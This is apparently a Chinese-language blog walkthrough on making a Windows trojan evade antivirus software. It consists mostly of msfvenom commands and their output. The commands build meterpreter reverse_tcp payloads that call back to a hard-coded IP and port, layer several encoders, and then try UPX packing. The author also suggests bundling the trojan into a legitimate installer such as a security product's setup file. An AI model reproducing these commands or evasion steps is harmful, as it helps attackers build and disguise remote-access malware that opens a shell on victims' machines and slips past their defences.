先簡單生成一個木馬

┌──(kali?kali)-[~]
└─$ msfvenom -p windows/meterpreter/reverse_tcp lhosts=61.139.2.130 lport=3333 -e cmd/echo -i 10 -f exe -o cmd_echo_113_3333_10.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of cmd/echo
cmd/echo succeeded with size 354 (iteration=0)
cmd/echo succeeded with size 354 (iteration=1)
cmd/echo succeeded with size 354 (iteration=2)
cmd/echo succeeded with size 354 (iteration=3)
cmd/echo succeeded with size 354 (iteration=4)
cmd/echo succeeded with size 354 (iteration=5)
cmd/echo succeeded with size 354 (iteration=6)
cmd/echo succeeded with size 354 (iteration=7)
cmd/echo succeeded with size 354 (iteration=8)
cmd/echo succeeded with size 354 (iteration=9)
cmd/echo chosen with final size 354
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: cmd_echo_113_3333_10.exe

這個我都不用試了，都不說360，windows自帶的殺軟都繞不過去，讓我們扔進微步看看怎么個事

最意料之中的一集

這次我們多編碼幾次看看

┌──(kali?kali)-[~]
└─$ msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=61.139.2.130 LPORT=3333 -f raw | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 10 -f exe -o payload2.0.exe
Attempting to read payload from STDIN...
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 20 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai succeeded with size 651 (iteration=10)
x86/shikata_ga_nai succeeded with size 678 (iteration=11)
x86/shikata_ga_nai succeeded with size 705 (iteration=12)
x86/shikata_ga_nai succeeded with size 732 (iteration=13)
x86/shikata_ga_nai succeeded with size 759 (iteration=14)
x86/shikata_ga_nai succeeded with size 786 (iteration=15)
x86/shikata_ga_nai succeeded with size 813 (iteration=16)
x86/shikata_ga_nai succeeded with size 840 (iteration=17)
x86/shikata_ga_nai succeeded with size 867 (iteration=18)
x86/shikata_ga_nai succeeded with size 894 (iteration=19)
x86/shikata_ga_nai chosen with final size 894
Payload size: 894 bytesFound 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/alpha_upper
x86/alpha_upper succeeded with size 1857 (iteration=0)
x86/alpha_upper succeeded with size 3783 (iteration=1)
x86/alpha_upper succeeded with size 7635 (iteration=2)
x86/alpha_upper succeeded with size 15339 (iteration=3)
x86/alpha_upper succeeded with size 30747 (iteration=4)
x86/alpha_upper succeeded with size 61563 (iteration=5)
x86/alpha_upper succeeded with size 123194 (iteration=6)
x86/alpha_upper succeeded with size 246456 (iteration=7)
x86/alpha_upper succeeded with size 492979 (iteration=8)
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/countdown
x86/countdown succeeded with size 16 (iteration=0)
x86/countdown succeeded with size 32 (iteration=1)
x86/countdown succeeded with size 48 (iteration=2)
x86/countdown succeeded with size 64 (iteration=3)
x86/countdown succeeded with size 80 (iteration=4)
x86/countdown succeeded with size 96 (iteration=5)
x86/countdown succeeded with size 112 (iteration=6)
x86/countdown succeeded with size 128 (iteration=7)
x86/countdown succeeded with size 144 (iteration=8)
x86/countdown succeeded with size 161 (iteration=9)
x86/countdown chosen with final size 161
Payload size: 161 bytes
Final size of exe file: 73802 bytes
Saved as: payload2.0.exe
x86/alpha_upper succeeded with size 986027 (iteration=9)
x86/alpha_upper chosen with final size 986027
Payload size: 986027 bytes

雖然不會落地就殺，但是還是不能運行，一運行就會報病毒

那就讓我們試一試UPX加殼

加殼

加殼是一類能夠對可執行文件進行加密壓縮并將解壓代碼嵌入其中的工具，當加殼的文件被運行后，解壓代碼會從已壓縮的數據中重建原始程序并運行

用到的是kali自帶的upx

┌──(root?kali)-[/home/kali]
└─# upxUltimate Packer for eXecutablesCopyright (C) 1996 - 2024
UPX 4.2.4       Markus Oberhumer, Laszlo Molnar & John Reiser    May 9th 2024Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..Commands:-1     compress faster                   -9    compress better-d     decompress                        -l    list compressed file-t     test compressed file              -V    display version number-h     give more help                    -L    display software license
Options:-q     be quiet                          -v    be verbose-oFILE write output to 'FILE'-f     force compression of suspicious files-k     keep backup files
file..   executables to (de)compressType 'upx --help' for more detailed help.UPX comes with ABSOLUTELY NO WARRANTY; for details visit https://upx.github.io

還是被檢測到了嗎，360，你這家伙

360還是太強悍了，拼盡全力無法戰勝

看來想要戰勝360大人的話還要再沉淀沉淀

捆綁安裝包

其實還有一種方法可以免殺，就是捆綁一個安裝包類似火絨的安裝包

【注意】Meatsploit 自帶了用于捆綁木馬的程序模板，其位置在data/templates/template.exe，雖然這個模板經常會更新，但是其仍是各大反病毒木馬廠商的關注重點。為了更好地實現免殺，此處自主選擇一個待捆綁程序。

但是這樣的免殺理論上是沒有UPX殼的效果好的，所以我也沒測（絕對不是因為懶）

事實上這些殺軟廠家也不是吃素的，在市面上能看到的免殺基本都不能免殺了，像是這些工具更是被重點防范，所以還是要靠自己編寫才行